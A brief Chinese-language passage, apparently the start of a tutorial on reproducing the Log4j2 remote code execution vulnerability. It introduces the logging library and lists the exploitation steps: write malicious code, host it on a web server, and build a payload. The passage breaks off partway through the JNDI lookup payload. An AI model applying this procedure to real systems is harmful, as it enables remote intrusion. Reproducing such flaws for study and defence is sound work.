Log4j2手把手的漏洞复现——简易版漏洞简介简易的漏洞复现
漏洞简介Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息.大多数情况下,开发人员可能会将用户输入导致的错误信息写入日志。攻击者可以利用该特性通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。这个漏洞的利用可以分为这样的流程: 编写恶意代码 开启服务器 Web 服务 将恶意代码编译并挂起到 Web 服务上 构造恶意 payload ( ${jndi:ld.
